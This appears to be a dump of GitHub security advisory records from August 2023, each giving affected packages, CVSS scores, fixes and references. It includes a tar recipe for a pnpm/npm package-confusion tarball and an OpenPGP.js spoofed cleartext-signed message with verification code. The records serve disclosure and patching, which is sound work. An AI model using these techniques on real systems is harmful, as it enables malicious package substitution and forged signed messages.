`tar -c -z --format ustar -f package.tgz a package z`
The order of the folders at the end matters; whichever one is last will end up being the package.json that wins when extracted by npm; the one that is first will be the one that wins when extracted by pnpm.
Install the tarball via the `file:` protocol.
Observe that with npm, the lockfile has `react@17`, while with pnpm it has `react@15`.
### Impact
This can result in a package that appears safe on the npm registry or when installed via npm being replaced with a compromised or malicious version when installed via pnpm.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'npm', 'name': 'pnpm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.33.4'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@pnpm/exe'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.33.4'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@pnpm/linux-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.33.4'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@pnpm/linux-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.33.4'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@pnpm/linuxstatic-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.33.4'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@pnpm/macos-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.33.4'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@pnpm/macos-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.33.4'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@pnpm/win-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.33.4'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@pnpm/cafs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.0.5'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'pnpm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.6.8'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@pnpm/exe'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.6.8'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@pnpm/linux-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.6.8'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@pnpm/linux-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.6.8'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@pnpm/linuxstatic-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.6.8'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@pnpm/macos-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.6.8'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@pnpm/macos-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.6.8'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@pnpm/win-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.6.8'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/pnpm/pnpm/security/advisories/GHSA-5r98-f33j-g8h7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37478'}, {'type': 'PACKAGE', 'url': 'https://github.com/pnpm/pnpm'}, {'type': 'WEB', 'url': 'https://github.com/pnpm/pnpm/releases/tag/v7.33.4'}, {'type': 'WEB', 'url': 'https://github.com/pnpm/pnpm/releases/tag/v8.6.8'}]
|
{'cwe_ids': ['CWE-284'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-01T17:00:55Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-22c3-whjv-hrfm
|
2023-08-16T21:14:04Z
|
2023-08-16T15:30:17Z
| null |
['CVE-2023-40337']
|
Jenkins Folders Plugin cross-site request forgery vulnerability
|
Jenkins Folders Plugin 6.846.v23698686f0f6 and earlier does not require POST requests for an HTTP endpoint, resulting in a cross-site request forgery (CSRF) vulnerability.
This vulnerability allows attackers to copy a view inside a folder.
Folders Plugin 6.848.ve3b_fd7839a_81 requires POST requests for the affected HTTP endpoint.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:cloudbees-folder'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.848.ve3b'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40337'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-08-16/#SECURITY-3105'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/08/16/3'}]
|
{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-16T21:14:04Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-crqf-q9fp-hwjw
|
2023-08-29T22:17:18Z
|
2023-08-24T15:31:10Z
| null |
['CVE-2023-34040']
|
Spring-Kafka has Java Deserialization vulnerability When Improperly Configured
|
In Spring for Apache Kafka 3.0.9 and earlier and versions 2.9.10 and earlier, a possible deserialization attack vector existed, but only if unusual configuration was applied. An attacker would have to construct a malicious serialized object in one of the deserialization exception record headers.
Specifically, an application is vulnerable when all of the following are true:
* The user does not configure an ErrorHandlingDeserializer for the key and/or value of the record
* The user explicitly sets container properties checkDeserExWhenKeyNull and/or checkDeserExWhenValueNull container properties to true.
* The user allows untrusted sources to publish to a Kafka topic
By default, these properties are false, and the container only attempts to deserialize the headers if an ErrorHandlingDeserializer is configured. The ErrorHandlingDeserializer prevents the vulnerability by removing any such malicious headers before processing the record.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.springframework.kafka:spring-kafka'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.8.0'}, {'fixed': '2.9.11'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework.kafka:spring-kafka'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.0.10'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34040'}, {'type': 'WEB', 'url': 'https://github.com/spring-projects/spring-kafka/commit/25ac793a78725e2ca4a3a2888a1506a4bfcf0c9d'}, {'type': 'WEB', 'url': 'https://github.com/spring-projects/spring-kafka/commit/eb779679812f61a8553ced3d0e4069dca65560ed'}, {'type': 'PACKAGE', 'url': 'https://github.com/spring-projects/spring-kafka'}, {'type': 'WEB', 'url': 'https://spring.io/security/cve-2023-34040'}]
|
{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-24T22:28:48Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-j8rm-cm55-qqj6
|
2023-08-11T20:54:45Z
|
2023-08-11T20:54:45Z
| null |
['CVE-2023-35391']
|
.NET Information Disclosure Vulnerability
|
# Microsoft Security Advisory CVE-2023-35391: .NET Information Disclosure Vulnerability
## <a name="executive-summary"></a>Executive summary
Microsoft is releasing this security advisory to provide information about a vulnerability in ASP.NET core 2.1, .NET 6.0 and, .NET 7.0. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.
A vulnerability exists in ASP.NET Core 2.1, .NET 6.0 and, .NET 7.0 applications using SignalR when redis backplane use might result in information disclosure.
## Announcement
Announcement for this issue can be found at https://github.com/dotnet/announcements/issues/267
### <a name="mitigation-factors"></a>Mitigation factors
Microsoft has not identified any mitigating factors for this vulnerability.
## <a name="affected-software"></a>Affected software
* Any .NET 7.0 application running on .NET 7.0.9 or earlier.
* Any .NET 6.0 application running on .NET 6.0.20 or earlier.
If your application uses the following package versions, ensure you update to the latest version of .NET.
### <a name=".NET 7"></a>.NET 7
Package name | Affected version | Patched version
------------ | ---------------- | -------------------------
[Microsoft.AspNetCore.SignalR.StackExchangeRedis](https://www.nuget.org/packages/Microsoft.AspNetCore.SignalR.StackExchangeRedis) | >= 7.0.0, <= 7.0.9 | 7.0.10
### <a name=".NET 6"></a>.NET 6
Package name | Affected version | Patched version
------------ | ---------------- | -------------------------
[Microsoft.AspNetCore.SignalR.StackExchangeRedis](https://www.nuget.org/packages/Microsoft.AspNetCore.SignalR.StackExchangeRedis) | >= 6.0.0, <= 6.0.20 | 6.0.21
### <a name="ASP.NET Core 2.1"></a>ASP.NET Core 2.1
Package name | Affected version | Patched version
------------ | ---------------- | -------------------------
[Microsoft.AspNetCore.SignalR.Redis](https://www.nuget.org/packages/Microsoft.AspNetCore.SignalR.Redis) | < 1.0.40 | 1.0.40
## Advisory FAQ
### <a name="how-affected"></a>How do I know if I am affected?
If you have a runtime or SDK with a version listed, or an affected package listed in [affected software](#affected-software), you're exposed to the vulnerability.
### <a name="how-fix"></a>How do I fix the issue?
* To fix the issue please install the latest version of .NET 6.0 or .NET 7.0. If you have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET SDKs.
* If you are using one of the affected packages, please update to the patched version listed above.
* If you have .NET 6.0 or greater installed, you can list the versions you have installed by running the `dotnet --info` command. You will see output like the following;
```
.NET Core SDK (reflecting any global.json):
Version: 6.0.300
Commit: 8473146e7d
Runtime Environment:
OS Name: Windows
OS Version: 10.0.18363
OS Platform: Windows
RID: win10-x64
Base Path: C:\Program Files\dotnet\sdk\6.0.300\
Host (useful for support):
Version: 6.0.5
Commit: 8473146e7d
.NET Core SDKs installed:
6.0.300 [C:\Program Files\dotnet\sdk]
.NET Core runtimes installed:
Microsoft.AspNetCore.App 6.0.5 [C:\Program Files\dotnet\shared\Microsoft.AspNetCore.App]
Microsoft.NETCore.App 6.0.5 [C:\Program Files\dotnet\shared\Microsoft.NETCore.App]
Microsoft.WindowsDesktop.App 6.0.5 [C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App]
To install additional .NET Core runtimes or SDKs:
https://aka.ms/dotnet-download
```
* If you're using .NET 7.0, you should download and install Runtime 7.0.10 or SDK 7.0.110 (for Visual Studio 2022 v17.4) from https://dotnet.microsoft.com/download/dotnet-core/7.0.
* If you're using .NET 6.0, you should download and install Runtime 6.0.21 or SDK 6.0.316 (for Visual Studio 2022 v17.2) from https://dotnet.microsoft.com/download/dotnet-core/6.0.
.NET 6.0 and and .NET 7.0 updates are also available from Microsoft Update. To access this either type "Check for updates" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates.
Once you have installed the updated runtime or SDK, restart your apps for the update to take effect.
Additionally, if you've deployed [self-contained applications](https://docs.microsoft.com/dotnet/core/deploying/#self-contained-deployments-scd) targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed.
## Other Information
### Reporting Security Issues
If you have found a potential security issue in .NET 6.0 or .NET 7.0, please email details to secure@microsoft.com. Reports may qualify for the Microsoft .NET Core & .NET 5 Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at <https://aka.ms/corebounty>.
### Support
You can ask questions about this issue on GitHub in the .NET GitHub organization. The main repos are located at https://github.com/dotnet/runtime and https://github.com/dotnet/aspnet/. The Announcements repo (https://github.com/dotnet/Announcements) will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue.
### Disclaimer
The information provided in this advisory is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
### External Links
[CVE-2023-35391]( https://www.cve.org/CVERecord?id=CVE-2023-35391)
### Revisions
V1.0 (August 08, 2023): Advisory published.
_Version 1.0_
_Last Updated 2023-08-08_
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N'}]
|
[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.SignalR.StackExchangeRedis'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.10'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.9'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.SignalR.StackExchangeRedis'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.21'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.20'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.SignalR.Redis'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.40'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/dotnet/aspnetcore/security/advisories/GHSA-j8rm-cm55-qqj6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35391'}, {'type': 'WEB', 'url': 'https://github.com/dotnet/announcements/issues/267'}, {'type': 'PACKAGE', 'url': 'https://github.com/dotnet/aspnetcore'}, {'type': 'WEB', 'url': 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-35391'}]
|
{'cwe_ids': ['CWE-200'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-11T20:54:45Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-xrrh-h86w-pwfj
|
2023-08-24T22:03:57Z
|
2023-08-15T18:31:32Z
| null |
['CVE-2023-38889']
|
Alluxio vulnerable to arbitrary code execution
|
An issue in Alluxio v.2.9.3 and before allows an attacker to execute arbitrary code via a crafted script to the username parameter of lluxio.util.CommonUtils.getUnixGroups(java.lang.String).
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.alluxio:alluxio-parent'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.9.3'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38889'}, {'type': 'WEB', 'url': 'https://github.com/Alluxio/alluxio/issues/17766'}, {'type': 'PACKAGE', 'url': 'https://github.com/Alluxio/alluxio'}]
|
{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-08-15T20:01:44Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-v4gr-v679-42p7
|
2023-08-09T14:39:21Z
|
2023-08-09T14:39:21Z
| null |
['CVE-2023-39530']
|
PrestaShop file deletion via CustomerMessage
|
### Impact
It is possible to delete files from the server via the CustomerMessage API
### Patches
8.1.1
### Found by
Kto94 (via Yeswehack)
### Workarounds
none
### References
none
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'prestashop/prestashop'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.1.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 8.1.0'}}]
|
[{'type': 'WEB', 'url': 'https://github.com/PrestaShop/PrestaShop/security/advisories/GHSA-v4gr-v679-42p7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39530'}, {'type': 'WEB', 'url': 'https://github.com/PrestaShop/PrestaShop/commit/6ce750b2367a7309b6bf50166f1873cb86ad57e9'}, {'type': 'PACKAGE', 'url': 'https://github.com/PrestaShop/PrestaShop'}]
|
{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-09T14:39:21Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-52h8-c876-989c
|
2023-08-03T16:42:42Z
|
2023-08-03T06:30:23Z
| null |
['CVE-2023-4127']
|
Answer has Race Condition within a Thread
|
Race Condition within a Thread in GitHub repository answerdev/answer prior to v1.1.1.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/answerdev/answer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.1'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-4127'}, {'type': 'WEB', 'url': 'https://github.com/answerdev/answer/commit/47661dc8a356ce6aa7793f1bd950399292180182'}, {'type': 'PACKAGE', 'url': 'https://github.com/answerdev/answer'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/cf7d19e3-1318-4c77-8366-d8d04a0b41ba'}]
|
{'cwe_ids': ['CWE-366'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-03T16:42:42Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-ch3c-v47x-4pgp
|
2023-08-29T17:36:40Z
|
2023-08-29T17:36:40Z
| null |
['CVE-2023-41037']
|
Cleartext Signed Message Signature Spoofing in openpgp
|
### Impact
OpenPGP Cleartext Signed Messages are cryptographically signed messages where the signed text is readable without special tools:
```
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
This text is signed.
-----BEGIN PGP SIGNATURE-----
wnUEARMIACcFgmTkrNAJkInXCgj0fgcIFiEE1JlKzzDGQxZmmHkYidcKCPR+
BwgAAKXDAQDWGhI7tPbhB+jlKwe4+yPJ+9X8aWDUG60XFNi/w8T7ZgEAsAGd
WJrkm/H5AXGZsqyqqO6IWGF0geTCd4mWm/CsveM=
-----END PGP SIGNATURE-----
```
These messages typically contain a "Hash: ..." header declaring the hash algorithm used to compute the signature digest.
OpenPGP.js up to v5.9.0 ignored any data preceding the "Hash: ..." texts when verifying the signature. As a result, malicious parties could add arbitrary text to a third-party Cleartext Signed Message, to lead the victim to believe that the arbitrary text was signed.
A user or application is vulnerable to said attack vector if it verifies the CleartextMessage by only checking the returned `verified` property, discarding the associated `data` information, and instead _visually trusting_ the contents of the original message:
```js
const cleartextMessage = `
-----BEGIN PGP SIGNED MESSAGE-----
This text is not signed but you might think it is. Hash: SHA256
This text is signed.
-----BEGIN PGP SIGNATURE-----
wnUEARMIACcFgmTkrNAJkInXCgj0fgcIFiEE1JlKzzDGQxZmmHkYidcKCPR+
BwgAAKXDAQDWGhI7tPbhB+jlKwe4+yPJ+9X8aWDUG60XFNi/w8T7ZgEAsAGd
WJrkm/H5AXGZsqyqqO6IWGF0geTCd4mWm/CsveM=
-----END PGP SIGNATURE-----
`;
const message = await openpgp.readCleartextMessage({ cleartextMessage });
const verificationResult = await verifyCleartextMessage({ message, verificationKeys });
console.log(await verificationResult.verified); // output: true
console.log(verificationResult.data); // output: 'This text is signed.'
```
Since `verificationResult.data` would always contain the actual signed data, users and apps that check this information are not vulnerable.
Similarly, given a CleartextMessage object, retrieving the data using `getText()` or the `text` field returns only the contents that are considered when verifying the signature.
Finally, re-armoring a CleartextMessage object (using `armor()` will also result in a "sanitised" version, with the extraneous text being removed.
Because of this, we consider the vulnerability impact to be very limited when the CleartextMessage is processed programmatically; this is reflected in the Severity CVSS assessment, specifically in the scope's score ("Unchanged").
### Patches
- v5.10.1 (current stable version) will reject messages when calling `openpgp.readCleartextMessage()`
- v4.10.11 (legacy version) will reject messages when calling `openpgp.cleartext.readArmored()`
### Workarounds
Check the contents of `verificationResult.data` to see what data was actually signed, rather than visually trusting the contents of the armored message.
### References
Similar CVE: https://sec-consult.com/vulnerability-lab/advisory/cleartext-message-spoofing-in-go-cryptography-libraries-cve-2019-11841/
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N'}]
|
[{'package': {'ecosystem': 'npm', 'name': 'openpgp'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.10.11'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'openpgp'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.10.1'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/openpgpjs/openpgpjs/security/advisories/GHSA-ch3c-v47x-4pgp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-41037'}, {'type': 'WEB', 'url': 'https://github.com/openpgpjs/openpgpjs/commit/6b43e02a254853f5ff508ebd1b07541f78b7c566'}, {'type': 'PACKAGE', 'url': 'https://github.com/openpgpjs/openpgpjs'}, {'type': 'WEB', 'url': 'https://github.com/openpgpjs/openpgpjs/releases/tag/v4.10.11'}, {'type': 'WEB', 'url': 'https://github.com/openpgpjs/openpgpjs/releases/tag/v5.10.1'}]
|
{'cwe_ids': ['CWE-347'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-29T17:36:40Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-w5vr-6qhr-36cc
|
2023-08-14T21:10:29Z
|
2023-08-14T21:10:29Z
| null |
[]
|
`ed25519-dalek` Double Public Key Signing Function Oracle Attack
|
Versions of `ed25519-dalek` prior to v2.0 model private and public keys as separate types which can be assembled into a `Keypair`, and also provide APIs for serializing and deserializing 64-byte private/public keypairs.
Such APIs and serializations are inherently unsafe as the public key is one of the inputs used in the deterministic computation of the `S` part of the signature, but not in the `R` value. An adversary could somehow use the signing function as an oracle that allows arbitrary public keys as input can obtain two signatures for the same message sharing the same `R` and only differ on the `S` part.
Unfortunately, when this happens, one can easily extract the private key.
Revised public APIs in v2.0 of `ed25519-dalek` do NOT allow a decoupled private/public keypair as signing input, except as part of specially labeled "hazmat" APIs which are clearly labeled as being dangerous if misused.
|
[]
|
[{'package': {'ecosystem': 'crates.io', 'name': 'ed25519-dalek'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.0'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/MystenLabs/ed25519-unsafe-libs'}, {'type': 'PACKAGE', 'url': 'https://github.com/dalek-cryptography/ed25519-dalek'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2022-0093.html'}]
|
{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-14T21:10:29Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-g6w6-h933-4rc5
|
2023-08-03T19:44:52Z
|
2023-08-03T19:44:52Z
| null |
[]
|
Soketi was exposed to Sandbox Escape vulnerability via vm2
|
### Impact
_What kind of vulnerability is it? Who is impacted?_
Anyone who might have used Soketi with the `cluster` driver (or through PM2).
### Patches
_Has the problem been patched? What versions should users upgrade to?_
Get the latest version of Soketi.
### Workarounds
_Is there a way for users to fix or remediate the vulnerability without upgrading?_
None. It's advised to upgrade to the latest version.
### References
_Are there any links users can visit to find out more?_
- https://github.com/advisories/GHSA-cchq-frgv-rjh5
- https://github.com/patriksimek/vm2/issues/533
- https://github.com/Unitech/pm2/issues/5643
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'npm', 'name': '@soketi/soketi'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.0'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/soketi/soketi/security/advisories/GHSA-g6w6-h933-4rc5'}, {'type': 'WEB', 'url': 'https://github.com/Unitech/pm2/issues/5643'}, {'type': 'WEB', 'url': 'https://github.com/patriksimek/vm2/issues/533'}, {'type': 'WEB', 'url': 'https://github.com/soketi/soketi/pull/927'}, {'type': 'WEB', 'url': 'https://github.com/soketi/soketi/commit/de12bff706c0d62e6a57dc1c7be3c4f014d0093a'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-cchq-frgv-rjh5'}, {'type': 'PACKAGE', 'url': 'https://github.com/soketi/soketi'}, {'type': 'WEB', 'url': 'https://github.com/soketi/soketi/releases/tag/1.6.0'}]
|
{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-08-03T19:44:52Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-m9r4-3fg7-pqm2
|
2023-08-09T14:35:36Z
|
2023-08-09T14:35:36Z
| null |
['CVE-2023-39525']
|
PrestaShop path traversal
|
### Impact
In the back office, files can be compromised using path traversal by replaying the import file deletion query with a specified file path, using traversal path.
### Patches
8.1.1
### Found by
Aleksey Solovev (Positive Technologies)
### Workarounds
none
### References
none
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'prestashop/prestashop'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.1.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 8.1.0'}}]
|
[{'type': 'WEB', 'url': 'https://github.com/PrestaShop/PrestaShop/security/advisories/GHSA-m9r4-3fg7-pqm2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39525'}, {'type': 'WEB', 'url': 'https://github.com/PrestaShop/PrestaShop/commit/c7c9a5110421bb2856f4d312ecce192d079b5ec7'}, {'type': 'PACKAGE', 'url': 'https://github.com/PrestaShop/PrestaShop'}]
|
{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-09T14:35:36Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-r3hf-q8q7-fv2p
|
2023-08-09T12:51:51Z
|
2023-08-09T12:51:51Z
| null |
[]
|
Angular critical CSS inlining Cross-site Scripting Vulnerability Advisory
|
### Impact
Angular Universal applications on 16.1.0 and 16.1.1 using critical CSS inlining are vulnerable to a [cross-site scripting (XSS)](https://owasp.org/www-community/attacks/xss/) attack where an attacker can trick another user into visiting a page which injects malicious JavaScript.
Angular CLI applications without Universal do perform critical CSS inlining as well, however exploiting this requires a malicious actor to already have access to modify source code directly.
### Patches
`@nguniversal/common` should be upgraded to 16.1.2 or higher. 16.2.0-rc.0 is safe.
### Workarounds
The easiest solution is likely to upgrade Universal to 16.1.2 or downgrade to 16.0.x or lower. Alternatively you can [override](https://docs.npmjs.com/cli/v9/configuring-npm/package-json#overrides) specifically the `critters` dependency with version `0.0.20` in your `package.json`.
```json
{
"overrides": {
"critters": "0.0.20"
}
}
```
### References
* [Angular Blog Post](https://blog.angular.io/notice-of-xss-issue-affecting-angular-universal-16-1-0-16-1-1-95dbae068f)
|
[]
|
[{'package': {'ecosystem': 'npm', 'name': '@nguniversal/common'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '16.1.0'}, {'fixed': '16.1.2'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/angular/universal/security/advisories/GHSA-r3hf-q8q7-fv2p'}, {'type': 'PACKAGE', 'url': 'https://github.com/angular/universal'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-09T12:51:51Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-r285-q736-9v95
|
2023-09-07T18:51:03Z
|
2023-08-31T00:30:17Z
| null |
['CVE-2023-39137']
|
Filename spoofing in archive
|
An issue in Archive v3.3.7 allows attackers to spoof zip filenames which can lead to inconsistent filename parsing.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]
|
